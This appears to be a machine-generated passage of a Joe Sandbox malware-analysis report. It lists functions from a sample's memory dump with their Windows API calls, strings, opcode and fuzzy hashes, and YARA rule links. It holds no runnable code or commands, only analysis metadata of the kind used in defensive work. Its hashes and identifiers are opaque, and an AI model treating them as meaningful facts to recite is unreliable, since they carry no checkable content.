                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                      Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                      Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                      Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                      Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                      • String ID: crts
                                      • API String ID: 943502515-3724388283
                                      • Opcode ID: 0e5f32304bbc4e17c5e8f493f416fcd7cfd0052beaa3b68be26e25aa650e50b9
                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                      • Opcode Fuzzy Hash: 0e5f32304bbc4e17c5e8f493f416fcd7cfd0052beaa3b68be26e25aa650e50b9
                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                      Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$LabelVolume
                                      • String ID: \VH
                                      • API String ID: 2006950084-234962358
                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                      Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                      • DrawMenuBar.USER32 ref: 00449761
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw_malloc
                                      • String ID: 0
                                      • API String ID: 772068139-4108050209
                                      • Opcode ID: 18ac7aff4def3dceb9c3c0786e3e7c9db117af3664550b96e0931e57fc03ab70
                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                      • Opcode Fuzzy Hash: 18ac7aff4def3dceb9c3c0786e3e7c9db117af3664550b96e0931e57fc03ab70
                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                      Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID: 3, 3, 8, 1
                                      • API String ID: 3469035223-357260408
                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                      Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                      • API String ID: 2574300362-3530519716
                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                      Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCreateFile
                                      • API String ID: 2574300362-275556492
                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                      Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpSendEcho
                                      • API String ID: 2574300362-58917771
                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                      Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                      Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                      • __itow.LIBCMT ref: 004699CD
                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                      • __itow.LIBCMT ref: 00469A97
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                      • Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                      Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                      Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                      Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
